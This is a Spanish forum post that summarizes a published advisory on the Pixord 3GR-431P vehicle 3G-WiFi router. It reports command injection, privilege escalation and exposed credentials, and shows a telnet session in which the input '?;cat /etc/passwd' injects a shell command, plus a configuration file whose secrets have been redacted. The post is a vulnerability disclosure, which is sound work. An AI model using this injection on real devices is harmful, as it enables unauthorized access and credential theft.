[h]Inyección de comandos y información sensible al descubierto en los puntos de acceso 3G-WiFi de Pixord para vehículos[/h]
https://www.wifi-libre.com/img/members/3/pixord.jpg
[h]Señor mecánico… ¡Tengo el router pinchado![/h]
Fuente :
[list=*]
]PIXORD Vehicle 3G Wi-Fi Router Command Injection / Information Disclosure de Karn GANESHEN @ Packet Storm/]
[/list]
No conocía hasta hoy al fabricante “Pixord” ni a su eslogan “Moving Pictures Around The World”.
¡Que bonito! 
**Pixord **es un empresa de Taiwan creada en el año 2000 y especializada en la producción de cameras vídeos para redes :
Pagina web oficial :
[list=*]
]PIXORD corporation/]
[/list]
Además de sus cameras vídeos fabrican también un modelo de router 3G-Wifi para coches : el 3GR-431P
https://www.wifi-libre.com/img/members/3/pixord2.png
Dos puertos ethernet y un chipset que convierte la señal 3G en una red WiFi 802.11n (2T2R).
Y lleva GPS (estamos en coche).
[h]Múltiples vulnerabilidades a bordo [/h]
Es por telnet que empieza el viaje…
miremos los comandos que son supuestamente disponibles:
[code]Vehicle 3G Wi-Fi Router
Login: admin
Password:
?
mobile3G
mobileGPS
model
reboot
restoredefault
version[/code]
Parece que estamos muy limitados… Pro no es así.
miremos lo que pasa si pedimos que nos abre el archivo “password” con el comando cat
[code]> ?;cat /etc/passwd
sh: ?: not found
admin::0:0:Adminstrator:/:/bin/sh
support::0:0:Adminstrator:/:/bin/sh
user::0:0:Adminstrator:/:/bin/sh
[/code]
ups… primera brecha podemos** inyectar comandos** .sh por telnet. 
El fichero password se puede abrir así desde cualquiera de las cuentas.
Un usuario cualquiera puede obtener la contraseña de administrador
Y tenemos a otra brecha : una escala de privilegios
Tercera brecha : las cuentas user y support tienen exactamente los mismos derechos que la de administrador.
Es un sin sentido.
Un usuario cualquiera puede entonces acceder directamente al fichero de configuración en uso : RT2880_Settings.dat
Una masacre en vivo :
[code]*Sensitive information in configuration file - *
*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
…
…
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
…
…
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
…
…
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
…
…
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
…
…
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
…
…
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
RADIUS_Key1=<radius_key_here>
…
…
[/code]
Contraseñas y llave WPA para tod@s…
El router tiene también un proceso raro en tarea de fondo (inadyn) que pasa las contraseñas en texto plano…
Si la seguridad al volante es muy importante entonces es mejor no usar un router Pixord…